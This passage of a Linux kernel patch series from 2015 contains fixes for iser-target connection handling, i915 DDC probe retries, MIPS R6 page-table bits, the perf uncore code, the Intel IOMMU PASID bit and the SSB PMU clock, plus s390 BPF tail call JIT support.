AC_WID_PIN) return 0; - parm = snd_hda_param_read(codec, nid, AC_PAR_DEVLIST_LEN); + parm = snd_hdac_read_parm_uncached(&codec->core, nid, AC_PAR_DEVLIST_LEN); if (parm == -1 && codec->bus->rirb_error) parm = 0; return parm & AC_DEV_LIST_LEN_MASK; From 9253e667ab50fd4611a60e1cdd6a6e05a1d91cf1 Mon Sep 17 00:00:00 2001 From: Sagi Grimberg Date: Thu, 4 Jun 2015 19:49:19 +0300 Subject: [PATCH 788/872] iser-target: Fix variable-length response error completion Since commit "2426bd456a6 target: Report correct response ..." we might get a command with data_size that does not fit to the number of allocated data sg elements. Given that we rely on cmd t_data_nents which might be different than the data_size, we sometimes receive local length error completion. The correct approach would be to take the command data_size into account when constructing the ib sg_list. Signed-off-by: Sagi Grimberg Signed-off-by: Jenny Falkovich Cc: stable@vger.kernel.org # 3.16+ Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index 3f40319a55da..2c86bd1f1417 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -2380,7 +2380,6 @@ isert_build_rdma_wr(struct isert_conn *isert_conn, struct isert_cmd *isert_cmd, page_off = offset % PAGE_SIZE; send_wr->sg_list = ib_sge; - send_wr->num_sge = sg_nents; send_wr->wr_id = (uintptr_t)&isert_cmd->tx_desc; /* * Perform mapping of TCM scatterlist memory ib_sge dma_addr. @@ -2400,14 +2399,17 @@ isert_build_rdma_wr(struct isert_conn *isert_conn, struct isert_cmd *isert_cmd, ib_sge->addr, ib_sge->length, ib_sge->lkey); page_off = 0; data_left -= ib_sge->length; + if (!data_left) + break; ib_sge++; isert_dbg("Incrementing ib_sge pointer to %p\n", ib_sge); } + send_wr->num_sge = ++i; isert_dbg("Set outgoing sg_list: %p num_sg: %u from TCM SGLs\n", send_wr->sg_list, send_wr->num_sge); - return sg_nents; + return send_wr->num_sge; } static int From 2f1b6b7d9a815f341b18dfd26a363f37d4d3c96a Mon Sep 17 00:00:00 2001 From: Sagi Grimberg Date: Thu, 4 Jun 2015 19:49:20 +0300 Subject: [PATCH 789/872] iser-target: release stale iser connections When receiving a new iser connect request we serialize the pending requests by adding the newly created iser connection to the np accept list and let the login thread process the connect request one by one (np_accept_wait). In case we received a disconnect request before the iser_conn has begun processing (still linked in np_accept_list) we should detach it from the list and clean it up and not have the login thread process a stale connection. We do it only when the connection state is not already terminating (initiator driven disconnect) as this might lead us to access np_accept_mutex after the np was released in live shutdown scenarios. Signed-off-by: Sagi Grimberg Signed-off-by: Jenny Falkovich Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 18 +++++++++++++++++- 1 file changed, 17 insertions(+), 1 deletion(-) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index 2c86bd1f1417..bad1f5d32227 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -65,6 +65,8 @@ static int isert_rdma_accept(struct isert_conn *isert_conn); struct rdma_cm_id *isert_setup_id(struct isert_np *isert_np); +static void isert_release_work(struct work_struct *work); + static inline bool isert_prot_cmd(struct isert_conn *conn, struct se_cmd *cmd) { @@ -648,6 +650,7 @@ isert_init_conn(struct isert_conn *isert_conn) mutex_init(&isert_conn->mutex); spin_lock_init(&isert_conn->pool_lock); INIT_LIST_HEAD(&isert_conn->fr_pool); + INIT_WORK(&isert_conn->release_work, isert_release_work); } static void @@ -925,6 +928,7 @@ isert_disconnected_handler(struct rdma_cm_id *cma_id, { struct isert_np *isert_np = cma_id->context; struct isert_conn *isert_conn; + bool terminating = false; if (isert_np->np_cm_id == cma_id) return isert_np_cma_handler(cma_id->context, event); @@ -932,12 +936,25 @@ isert_disconnected_handler(struct rdma_cm_id *cma_id, isert_conn = cma_id->qp->qp_context; mutex_lock(&isert_conn->mutex); + terminating = (isert_conn->state == ISER_CONN_TERMINATING); isert_conn_terminate(isert_conn); mutex_unlock(&isert_conn->mutex); isert_info("conn %p completing wait\n", isert_conn); complete(&isert_conn->wait); + if (terminating) + goto out; + + mutex_lock(&isert_np->np_accept_mutex); + if (!list_empty(&isert_conn->accept_node)) { + list_del_init(&isert_conn->accept_node); + isert_put_conn(isert_conn); + queue_work(isert_release_wq, &isert_conn->release_work); + } + mutex_unlock(&isert_np->np_accept_mutex); + +out: return 0; } @@ -3368,7 +3385,6 @@ static void isert_wait_conn(struct iscsi_conn *conn) isert_wait4flush(isert_conn); isert_wait4logout(isert_conn); - INIT_WORK(&isert_conn->release_work, isert_release_work); queue_work(isert_release_wq, &isert_conn->release_work); } From 524630d5824c7a75aab568c6bd1423fd748cd3bb Mon Sep 17 00:00:00 2001 From: Sagi Grimberg Date: Thu, 4 Jun 2015 19:49:21 +0300 Subject: [PATCH 790/872] iser-target: Fix possible use-after-free iser connection termination process happens in 2 stages: - isert_wait_conn: - resumes rdma disconnect - wait for session commands - wait for flush completions (post a marked wr to signal we are done) - wait for logout completion - queue work for connection cleanup (depends on disconnected/timewait events) - isert_free_conn - last reference put on the connection In case we are terminating during IOs, we might be posting send/recv requests after we posted the last work request which might lead to a use-after-free condition in isert_handle_wc. After we posted the last wr in isert_wait_conn we are guaranteed that no successful completions will follow (meaning no new work request posts may happen) but other flush errors might still come. So before we put the last reference on the connection, we repeat the process of posting a marked work request (isert_wait4flush) in order to make sure all pending completions were flushed. Signed-off-by: Sagi Grimberg Signed-off-by: Jenny Falkovich Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Nicholas Bellinger --- drivers/infiniband/ulp/isert/ib_isert.c | 1 + 1 file changed, 1 insertion(+) diff --git a/drivers/infiniband/ulp/isert/ib_isert.c b/drivers/infiniband/ulp/isert/ib_isert.c index bad1f5d32227..575a072d765f 100644 --- a/drivers/infiniband/ulp/isert/ib_isert.c +++ b/drivers/infiniband/ulp/isert/ib_isert.c @@ -3392,6 +3392,7 @@ static void isert_free_conn(struct iscsi_conn *conn) { struct isert_conn *isert_conn = conn->context; + isert_wait4flush(isert_conn); isert_put_conn(isert_conn); } From 3f5f1554ee715639e78d9be87623ee82772537e0 Mon Sep 17 00:00:00 2001 From: Jani Nikula Date: Tue, 2 Jun 2015 19:21:15 +0300 Subject: [PATCH 791/872] drm/i915: Fix DDC probe for passive adapters MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Passive DP->DVI/HDMI dongles on DP++ ports show up to the system as HDMI devices, as they do not have a sink device in them to respond to any AUX traffic. When probing these dongles over the DDC, sometimes they will NAK the first attempt even though the transaction is valid and they support the DDC protocol. The retry loop inside of drm_do_probe_ddc_edid() would normally catch this case and try the transaction again, resulting in success. That, however, was thwarted by the fix for [1]: commit 9292f37e1f5c79400254dca46f83313488093825 Author: Eugeni Dodonov Date: Thu Jan 5 09:34:28 2012 -0200 drm: give up on edid retries when i2c bus is not responding This added code to exit immediately if the return code from the i2c_transfer function was -ENXIO in order to reduce the amount of time spent in waiting for unresponsive or disconnected devices. That was possible because the underlying i2c bit banging algorithm had retries of its own (which, of course, were part of the reason for the bug the commit fixes). Since its introduction in commit f899fc64cda8569d0529452aafc0da31c042df2e Author: Chris Wilson Date: Tue Jul 20 15:44:45 2010 -0700 drm/i915: use GMBUS to manage i2c links we've been flipping back and forth enabling the GMBUS transfers, but we've settled since then. The GMBUS implementation does not do any retries, however, bailing out of the drm_do_probe_ddc_edid() retry loop on first encounter of -ENXIO. This, combined with Eugeni's commit, broke the retry on -ENXIO. Retry GMBUS once on -ENXIO on first message to mitigate the issues with passive adapters. This patch is based on the work, and commit message, by Todd Previte . [1] https://bugs.freedesktop.org/show_bug.cgi?id=41059 v2: Don't retry if using bit banging. v3: Move retry within gmbux_xfer, retry only on first message. v4: Initialize GMBUS0 on retry (Ville). v5: Take index reads into account (Ville). Bugzilla: https://bugs.freedesktop.org/show_bug.cgi?id=85924 Cc: Todd Previte Cc: stable@vger.kernel.org Tested-by: Oliver Grafe (v2) Tested-by: Jim Bride Reviewed-by: Ville Syrjälä Signed-off-by: Jani Nikula --- drivers/gpu/drm/i915/intel_i2c.c | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/drivers/gpu/drm/i915/intel_i2c.c b/drivers/gpu/drm/i915/intel_i2c.c index 56e437e31580..ae628001fd97 100644 --- a/drivers/gpu/drm/i915/intel_i2c.c +++ b/drivers/gpu/drm/i915/intel_i2c.c @@ -435,7 +435,7 @@ gmbus_xfer(struct i2c_adapter *adapter, struct intel_gmbus, adapter); struct drm_i915_private *dev_priv = bus->dev_priv; - int i, reg_offset; + int i = 0, inc, try = 0, reg_offset; int ret = 0; intel_aux_display_runtime_get(dev_priv); @@ -448,12 +448,14 @@ gmbus_xfer(struct i2c_adapter *adapter, reg_offset = dev_priv->gpio_mmio_base; +retry: I915_WRITE(GMBUS0 + reg_offset, bus->reg0); - for (i = 0; i < num; i++) { + for (; i < num; i += inc) { + inc = 1; if (gmbus_is_index_read(msgs, i, num)) { ret = gmbus_xfer_index_read(dev_priv, &msgs[i]); - i += 1; /* set i to the index of the read xfer */ + inc = 2; /* an index read is two msgs */ } else if (msgs[i].flags & I2C_M_RD) { ret = gmbus_xfer_read(dev_priv, &msgs[i], 0); } else { @@ -525,6 +527,18 @@ gmbus_xfer(struct i2c_adapter *adapter, adapter->name, msgs[i].addr, (msgs[i].flags & I2C_M_RD) ? 'r' : 'w', msgs[i].len); + /* + * Passive adapters sometimes NAK the first probe. Retry the first + * message once on -ENXIO for GMBUS transfers; the bit banging algorithm + * has retries internally. See also the retry loop in + * drm_do_probe_ddc_edid, which bails out on the first -ENXIO. + */ + if (ret == -ENXIO && i == 0 && try++ == 0) { + DRM_DEBUG_KMS("GMBUS [%s] NAK on first message, retry\n", + adapter->name); + goto retry; + } + goto out; timeout: From d7b631419b3d230a4d383a8c5f5f294f3bc564f9 Mon Sep 17 00:00:00 2001 From: Markos Chandras Date: Fri, 29 May 2015 14:43:52 +0100 Subject: [PATCH 792/872] MIPS: pgtable-bits: Fix XPA damage to R6 definitions. Commit be0c37c985ed ("MIPS: Rearrange PTE bits into fixed positions.") rearranged the PTE bits into fixed positions in preparation for the XPA support. However, this patch broke R6 since it only took R2 cores into consideration for the RI/XI bits leading to boot failures. We fix this by adding the missing CONFIG_CPU_MIPSR6 definitions Fixes: be0c37c985ed ("MIPS: Rearrange PTE bits into fixed positions.") Cc: Steven J. Hill Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10208/ Signed-off-by: Markos Chandras Signed-off-by: Ralf Baechle --- arch/mips/include/asm/pgtable-bits.h | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/arch/mips/include/asm/pgtable-bits.h b/arch/mips/include/asm/pgtable-bits.h index 18ae5ddef118..c28a8499aec7 100644 --- a/arch/mips/include/asm/pgtable-bits.h +++ b/arch/mips/include/asm/pgtable-bits.h @@ -113,7 +113,7 @@ #define _PAGE_PRESENT_SHIFT 0 #define _PAGE_PRESENT (1 << _PAGE_PRESENT_SHIFT) /* R2 or later cores check for RI/XI support to determine _PAGE_READ */ -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) #define _PAGE_WRITE_SHIFT (_PAGE_PRESENT_SHIFT + 1) #define _PAGE_WRITE (1 << _PAGE_WRITE_SHIFT) #else @@ -135,16 +135,16 @@ #define _PAGE_SPLITTING (1 << _PAGE_SPLITTING_SHIFT) /* Only R2 or newer cores have the XI bit */ -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) #define _PAGE_NO_EXEC_SHIFT (_PAGE_SPLITTING_SHIFT + 1) #else #define _PAGE_GLOBAL_SHIFT (_PAGE_SPLITTING_SHIFT + 1) #define _PAGE_GLOBAL (1 << _PAGE_GLOBAL_SHIFT) -#endif /* CONFIG_CPU_MIPSR2 */ +#endif /* CONFIG_CPU_MIPSR2 || CONFIG_CPU_MIPSR6 */ #endif /* CONFIG_64BIT && CONFIG_MIPS_HUGE_TLB_SUPPORT */ -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) /* XI - page cannot be executed */ #ifndef _PAGE_NO_EXEC_SHIFT #define _PAGE_NO_EXEC_SHIFT (_PAGE_MODIFIED_SHIFT + 1) @@ -160,10 +160,10 @@ #define _PAGE_GLOBAL_SHIFT (_PAGE_NO_READ_SHIFT + 1) #define _PAGE_GLOBAL (1 << _PAGE_GLOBAL_SHIFT) -#else /* !CONFIG_CPU_MIPSR2 */ +#else /* !CONFIG_CPU_MIPSR2 && !CONFIG_CPU_MIPSR6 */ #define _PAGE_GLOBAL_SHIFT (_PAGE_MODIFIED_SHIFT + 1) #define _PAGE_GLOBAL (1 << _PAGE_GLOBAL_SHIFT) -#endif /* CONFIG_CPU_MIPSR2 */ +#endif /* CONFIG_CPU_MIPSR2 || CONFIG_CPU_MIPSR6 */ #define _PAGE_VALID_SHIFT (_PAGE_GLOBAL_SHIFT + 1) #define _PAGE_VALID (1 << _PAGE_VALID_SHIFT) @@ -205,7 +205,7 @@ */ static inline uint64_t pte_to_entrylo(unsigned long pte_val) { -#ifdef CONFIG_CPU_MIPSR2 +#if defined(CONFIG_CPU_MIPSR2) || defined(CONFIG_CPU_MIPSR6) if (cpu_has_rixi) { int sa; #ifdef CONFIG_32BIT From 15c1247953e8a45232ed5a5540f291d2d0a77665 Mon Sep 17 00:00:00 2001 From: Ingo Molnar Date: Tue, 9 Jun 2015 11:40:28 +0200 Subject: [PATCH 793/872] Revert "perf/x86/intel/uncore: Move uncore_box_init() out of driver initialization" This reverts commit c05199e5a57a579fea1e8fa65e2b511ceb524ffc. Vince Weaver reported the following crash while perf fuzzing: [ 79.473121] kernel BUG at mm/vmalloc.c:1335! [ 79.694391] Call Trace: [ 79.696997] [ 79.699090] [] get_vm_area_caller+0x40/0x50 [ 79.705505] [] ? snb_uncore_imc_init_box+0x6d/0x90 [ 79.712414] [] __ioremap_caller+0x195/0x350 [ 79.718610] [] ? snb_uncore_imc_init_box+0x6d/0x90 [ 79.725462] [] ? debug_object_activate+0x14b/0x1e0 [ 79.732346] [] ioremap_nocache+0x17/0x20 [ 79.738283] [] snb_uncore_imc_init_box+0x6d/0x90 [ 79.744945] [] snb_uncore_imc_event_start+0xb7/0x110 [ 79.752020] [] snb_uncore_imc_event_add+0x47/0x60 [ 79.758832] [] event_sched_in.isra.85+0xfb/0x330 [ 79.765519] [] group_sched_in+0x6f/0x1e0 [ 79.771481] [] ? native_sched_clock+0x2a/0x90 [ 79.777858] [] __perf_event_enable+0x25c/0x2a0 [ 79.784418] [] ? tick_nohz_irq_exit+0x29/0x30 [ 79.790820] [] ? cpu_clock_event_start+0x40/0x40 [ 79.797546] [] remote_function+0x50/0x60 [ 79.803535] [] flush_smp_call_function_queue+0x81/0x180 [ 79.810840] [] generic_smp_call_function_single_interrupt+0x13/0x60 [ 79.819328] [] smp_trace_call_function_single_interrupt+0x38/0xc0 [ 79.827614] [] trace_call_function_single_interrupt+0x6e/0x80 [ 79.835465] [ 79.837543] [] ? cpuidle_enter_state+0x65/0x160 [ 79.844377] [] ? cpuidle_enter_state+0x51/0x160 [ 79.851015] [] cpuidle_enter+0x17/0x20 [ 79.856791] [] cpu_startup_entry+0x399/0x440 [ 79.863165] [] rest_init+0xbb/0xd0 The offending commit is clearly confused as it moves heavy initialization work into IPI context. Revert it. Reported-by: Vince Weaver Acked-by: Peter Zijlstra (Intel) Cc: Kan Liang Cc: Arnaldo Carvalho de Melo Cc: Stephane Eranian Cc: Yan, Zheng Cc: linux-kernel@vger.kernel.org Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/perf_event_intel_uncore.c | 9 +++++++-- arch/x86/kernel/cpu/perf_event_intel_uncore.h | 18 ++++++++---------- 2 files changed, 15 insertions(+), 12 deletions(-) diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.c b/arch/x86/kernel/cpu/perf_event_intel_uncore.c index dd319e59246b..90b7c501c95b 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.c +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.c @@ -839,6 +839,7 @@ static int uncore_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id box->phys_id = phys_id; box->pci_dev = pdev; box->pmu = pmu; + uncore_box_init(box); pci_set_drvdata(pdev, box); raw_spin_lock(&uncore_box_lock); @@ -1002,8 +1003,10 @@ static int uncore_cpu_starting(int cpu) pmu = &type->pmus[j]; box = *per_cpu_ptr(pmu->box, cpu); /* called by uncore_cpu_init? */ - if (box && box->phys_id >= 0) + if (box && box->phys_id >= 0) { + uncore_box_init(box); continue; + } for_each_online_cpu(k) { exist = *per_cpu_ptr(pmu->box, k); @@ -1019,8 +1022,10 @@ static int uncore_cpu_starting(int cpu) } } - if (box) + if (box) { box->phys_id = phys_id; + uncore_box_init(box); + } } } return 0; diff --git a/arch/x86/kernel/cpu/perf_event_intel_uncore.h b/arch/x86/kernel/cpu/perf_event_intel_uncore.h index f789ec9a0133..ceac8f5dc018 100644 --- a/arch/x86/kernel/cpu/perf_event_intel_uncore.h +++ b/arch/x86/kernel/cpu/perf_event_intel_uncore.h @@ -258,14 +258,6 @@ static inline int uncore_num_counters(struct intel_uncore_box *box) return box->pmu->type->num_counters; } -static inline void uncore_box_init(struct intel_uncore_box *box) -{ - if (!test_and_set_bit(UNCORE_BOX_FLAG_INITIATED, &box->flags)) { - if (box->pmu->type->ops->init_box) - box->pmu->type->ops->init_box(box); - } -} - static inline void uncore_disable_box(struct intel_uncore_box *box) { if (box->pmu->type->ops->disable_box) @@ -274,8 +266,6 @@ static inline void uncore_disable_box(struct intel_uncore_box *box) static inline void uncore_enable_box(struct intel_uncore_box *box) { - uncore_box_init(box); - if (box->pmu->type->ops->enable_box) box->pmu->type->ops->enable_box(box); } @@ -298,6 +288,14 @@ static inline u64 uncore_read_counter(struct intel_uncore_box *box, return box->pmu->type->ops->read_counter(box, event); } +static inline void uncore_box_init(struct intel_uncore_box *box) +{ + if (!test_and_set_bit(UNCORE_BOX_FLAG_INITIATED, &box->flags)) { + if (box->pmu->type->ops->init_box) + box->pmu->type->ops->init_box(box); + } +} + static inline bool uncore_box_is_fake(struct intel_uncore_box *box) { return (box->phys_id < 0); From bd00c606a6f60ca015a62bdbf671eadd48a4ca82 Mon Sep 17 00:00:00 2001 From: David Woodhouse Date: Tue, 9 Jun 2015 15:06:55 +0100 Subject: [PATCH 794/872] iommu/vt-d: Change PASID support to bit 40 of Extended Capability Register The existing hardware implementations with PASID support advertised in bit 28? Forget them. They do not exist. Bit 28 means nothing. When we have something that works, it'll use bit 40. Do not attempt to infer anything meaningful from bit 28. This will be reflected in an updated VT-d spec in the extremely near future. Signed-off-by: David Woodhouse --- include/linux/intel-iommu.h | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/include/linux/intel-iommu.h b/include/linux/intel-iommu.h index 796ef9645827..a240e61a7700 100644 --- a/include/linux/intel-iommu.h +++ b/include/linux/intel-iommu.h @@ -115,13 +115,14 @@ static inline void dmar_writeq(void __iomem *addr, u64 val) * Extended Capability Register */ +#define ecap_pasid(e) ((e >> 40) & 0x1) #define ecap_pss(e) ((e >> 35) & 0x1f) #define ecap_eafs(e) ((e >> 34) & 0x1) #define ecap_nwfs(e) ((e >> 33) & 0x1) #define ecap_srs(e) ((e >> 31) & 0x1) #define ecap_ers(e) ((e >> 30) & 0x1) #define ecap_prs(e) ((e >> 29) & 0x1) -#define ecap_pasid(e) ((e >> 28) & 0x1) +/* PASID support used to be on bit 28 */ #define ecap_dis(e) ((e >> 27) & 0x1) #define ecap_nest(e) ((e >> 26) & 0x1) #define ecap_mts(e) ((e >> 25) & 0x1) From 36f6ea2b21cce09f4f85a8fca007aa6a927804f7 Mon Sep 17 00:00:00 2001 From: Hauke Mehrtens Date: Sun, 7 Jun 2015 01:52:51 +0200 Subject: [PATCH 795/872] SSB: Fix handling of ssb_pmu_get_alp_clock() Dan Carpenter reported missing brackets which resulted in reading a wrong crystalfreq value. I also noticed that the result of this function is ignored. Reported-By: Dan Carpenter Signed-off-by: Hauke Mehrtens Signed-off-by: Michael Buesch Cc: davem@davemloft.net Cc: netdev@vger.kernel.org Cc: linux-mips@linux-mips.org Patchwork: https://patchwork.linux-mips.org/patch/10536/ Signed-off-by: Ralf Baechle --- drivers/ssb/driver_chipcommon_pmu.c | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/ssb/driver_chipcommon_pmu.c b/drivers/ssb/driver_chipcommon_pmu.c index 09428412139e..c5352ea4821e 100644 --- a/drivers/ssb/driver_chipcommon_pmu.c +++ b/drivers/ssb/driver_chipcommon_pmu.c @@ -621,8 +621,8 @@ static u32 ssb_pmu_get_alp_clock_clk0(struct ssb_chipcommon *cc) u32 crystalfreq; const struct pmu0_plltab_entry *e = NULL; - crystalfreq = chipco_read32(cc, SSB_CHIPCO_PMU_CTL) & - SSB_CHIPCO_PMU_CTL_XTALFREQ >> SSB_CHIPCO_PMU_CTL_XTALFREQ_SHIFT; + crystalfreq = (chipco_read32(cc, SSB_CHIPCO_PMU_CTL) & + SSB_CHIPCO_PMU_CTL_XTALFREQ) >> SSB_CHIPCO_PMU_CTL_XTALFREQ_SHIFT; e = pmu0_plltab_find_entry(crystalfreq); BUG_ON(!e); return e->freq * 1000; @@ -634,7 +634,7 @@ u32 ssb_pmu_get_alp_clock(struct ssb_chipcommon *cc) switch (bus->chip_id) { case 0x5354: - ssb_pmu_get_alp_clock_clk0(cc); + return ssb_pmu_get_alp_clock_clk0(cc); default: ssb_err("ERROR: PMU alp clock unknown for device %04X\n", bus->chip_id); From 6651ee070b3124fe9b9db383e3a895a0e4aded65 Mon Sep 17 00:00:00 2001 From: Michael Holzheu Date: Mon, 8 Jun 2015 21:51:06 -0700 Subject: [PATCH 796/872] s390/bpf: implement bpf_tail_call() helper bpf_tail_call() arguments: - ctx......: Context pointer - jmp_table: One of BPF_MAP_TYPE_PROG_ARRAY maps used as the jump table - index....: Index in the jump table In this implementation s390x JIT does stack unwinding and jumps into the callee program prologue. Caller and callee use the same stack. With this patch a tail call generates the following code on s390x: if (index >= array->map.max_entries) goto out 000003ff8001c7e4: e31030100016 llgf %r1,16(%r3) 000003ff8001c7ea: ec41001fa065 clgrj %r4,%r1,10,3ff8001c828 if (tail_call_cnt++ > MAX_TAIL_CALL_CNT) goto out; 000003ff8001c7f0: a7080001 lhi %r0,1 000003ff8001c7f4: eb10f25000fa laal %r1,%r0,592(%r15) 000003ff8001c7fa: ec120017207f clij %r1,32,2,3ff8001c828 prog = array->prog[index]; if (prog == NULL) goto out; 000003ff8001c800: eb140003000d sllg %r1,%r4,3 000003ff8001c806: e31310800004 lg %r1,128(%r3,%r1) 000003ff8001c80c: ec18000e007d clgij %r1,0,8,3ff8001c828 Restore registers before calling function 000003ff8001c812: eb68f2980004 lmg %r6,%r8,664(%r15) 000003ff8001c818: ebbff2c00004 lmg %r11,%r15,704(%r15) goto *(prog->bpf_func + tail_call_start); 000003ff8001c81e: e31100200004 lg %r1,32(%r1,%r0) 000003ff8001c824: 47f01006 bc 15,6(%r1) Reviewed-by: Martin Schwidefsky Signed-off-by: Michael Holzheu Acked-by: Heiko Carstens Signed-off-by: Alexei Starovoitov Signed-off-by: David S. Miller --- arch/s390/net/bpf_jit.h | 10 +++- arch/s390/net/bpf_jit_comp.c | 106 ++++++++++++++++++++++++++++++++++- 2 files changed, 112 insertions(+), 4 deletions(-) diff --git a/arch/s390/net/bpf_jit.h b/arch/s390/net/bpf_jit.h index de156ba3bd71..f6498eec9ee1 100644 --- a/arch/s390/net/bpf_jit.h +++ b/arch/s390/net/bpf_jit.h @@ -28,6 +28,9 @@ extern u8 sk_load_word[], sk_load_half[], sk_load_byte[]; * | old backchain | | * +---------------+ | * | r15 - r6 | | + * +---------------+ | + * | 4 byte align | | + * | tail_call_cnt | | * BFP -> +===============+ | * | | | * | BPF stack | | @@ -46,14 +49,17 @@ extern u8 sk_load_word[], sk_load_half[], sk_load_byte[]; * R15 -> +---------------+ + low * * We get 160 bytes stack space from calling function, but only use - * 11 * 8 byte (old backchain + r15 - r6) for storing registers. + * 12 * 8 byte for old backchain, r15..r6, and tail_call_cnt. */ #define STK_SPACE (MAX_BPF_STACK + 8 + 4 + 4 + 160) -#define STK_160_UNUSED (160 - 11 * 8) +#define STK_160_UNUSED (160 - 12 * 8) #define STK_OFF (STK_SPACE - STK_160_UNUSED) #define STK_OFF_TMP 160 /* Offset of tmp buffer on stack */ #define STK_OFF_HLEN 168 /* Offset of SKB header length on stack */ +#define STK_OFF_R6 (160 - 11 * 8) /* Offset of r6 on stack */ +#define STK_OFF_TCCNT (160 - 12 * 8) /* Offset of tail_call_cnt on stack */ + /* Offset to skip condition code check */ #define OFF_OK 4 diff --git a/arch/s390/net/bpf_jit_comp.c b/arch/s390/net/bpf_jit_comp.c index 55423d8be580..d3766dd67e23 100644 --- a/arch/s390/net/bpf_jit_comp.c +++ b/arch/s390/net/bpf_jit_comp.c @@ -21,6 +21,7 @@ #include #include #include +#include #include #include #include "bpf_jit.h" @@ -40,6 +41,8 @@ struct bpf_jit { int base_ip; /* Base address for literal pool */ int ret0_ip; /* Address of return 0 */ int exit_ip; /* Address of exit */ + int tail_call_start; /* Tail call start offset */ + int labels[1]; /* Labels for local jumps */ }; #define BPF_SIZE_MAX 4096 /* Max size for program */ @@ -49,6 +52,7 @@ struct bpf_jit { #define SEEN_RET0 4 /* ret0_ip points to a valid return 0 */ #define SEEN_LITERAL 8 /* code uses literals */ #define SEEN_FUNC 16 /* calls C functions */ +#define SEEN_TAIL_CALL 32 /* code uses tail calls */ #define SEEN_STACK (SEEN_FUNC | SEEN_MEM | SEEN_SKB) /* @@ -60,6 +64,7 @@ struct bpf_jit { #define REG_L (__MAX_BPF_REG+3) /* Literal pool register */ #define REG_15 (__MAX_BPF_REG+4) /* Register 15 */ #define REG_0 REG_W0 /* Register 0 */ +#define REG_1 REG_W1 /* Register 1 */ #define REG_2 BPF_REG_1 /* Register 2 */ #define REG_14 BPF_REG_0 /* Register 14 */ @@ -223,6 +228,24 @@ static inline void reg_set_seen(struct bpf_jit *jit, u32 b1) REG_SET_SEEN(b3); \ }) +#define EMIT6_PCREL_LABEL(op1, op2, b1, b2, label, mask) \ +({ \ + int rel = (jit->labels[label] - jit->prg) >> 1; \ + _EMIT6(op1 | reg(b1, b2) << 16 | (rel & 0xffff), \ + op2 | mask << 12); \ + REG_SET_SEEN(b1); \ + REG_SET_SEEN(b2); \ +}) + +#define EMIT6_PCREL_IMM_LABEL(op1, op2, b1, imm, label, mask) \ +({ \ + int rel = (jit->labels[label] - jit->prg) >> 1; \ + _EMIT6(op1 | (reg_high(b1) | mask) << 16 | \ + (rel & 0xffff), op2 | (imm & 0xff) << 8); \ + REG_SET_SEEN(b1); \ + BUILD_BUG_ON(((unsigned long) imm) > 0xff); \ +}) + #define EMIT6_PCREL(op1, op2, b1, b2, i, off, mask) \ ({ \ /* Branch instruction needs 6 bytes */ \ @@ -286,7 +309,7 @@ static void jit_fill_hole(void *area, unsigned int size) */ static void save_regs(struct bpf_jit *jit, u32 rs, u32 re) { - u32 off = 72 + (rs - 6) * 8; + u32 off = STK_OFF_R6 + (rs - 6) * 8; if (rs == re) /* stg %rs,off(%r15) */ @@ -301,7 +324,7 @@ static void save_regs(struct bpf_jit *jit, u32 rs, u32 re) */ static void restore_regs(struct bpf_jit *jit, u32 rs, u32 re) { - u32 off = 72 + (rs - 6) * 8; + u32 off = STK_OFF_R6 + (rs - 6) * 8; if (jit->seen & SEEN_STACK) off += STK_OFF; @@ -374,6 +397,16 @@ static void save_restore_regs(struct bpf_jit *jit, int op) */ static void bpf_jit_prologue(struct bpf_jit *jit) { + if (jit->seen & SEEN_TAIL_CALL) { + /* xc STK_OFF_TCCNT(4,%r15),STK_OFF_TCCNT(%r15) */ + _EMIT6(0xd703f000 | STK_OFF_TCCNT, 0xf000 | STK_OFF_TCCNT); + } else { + /* j tail_call_start: NOP if no tail calls are used */ + EMIT4_PCREL(0xa7f40000, 6); + _EMIT2(0); + } + /* Tail calls have to skip above initialization */ + jit->tail_call_start = jit->prg; /* Save registers */ save_restore_regs(jit, REGS_SAVE); /* Setup literal pool */ @@ -951,6 +984,75 @@ static noinline int bpf_jit_insn(struct bpf_jit *jit, struct bpf_prog *fp, int i EMIT4(0xb9040000, BPF_REG_0, REG_2); break; } + case BPF_JMP | BPF_CALL | BPF_X: + /* + * Implicit input: + * B1: pointer to ctx + * B2: pointer to bpf_array + * B3: index in bpf_array + */ + jit->seen |= SEEN_TAIL_CALL; + + /* + * if (index >= array->map.max_entries) + * goto out; + */ + + /* llgf %w1,map.max_entries(%b2) */ + EMIT6_DISP_LH(0xe3000000, 0x0016, REG_W1, REG_0, BPF_REG_2, + offsetof(struct bpf_array, map.max_entries)); + /* clgrj %b3,%w1,0xa,label0: if %b3 >= %w1 goto out */ + EMIT6_PCREL_LABEL(0xec000000, 0x0065, BPF_REG_3, + REG_W1, 0, 0xa); + + /* + * if (tail_call_cnt++ > MAX_TAIL_CALL_CNT) + * goto out; + */ 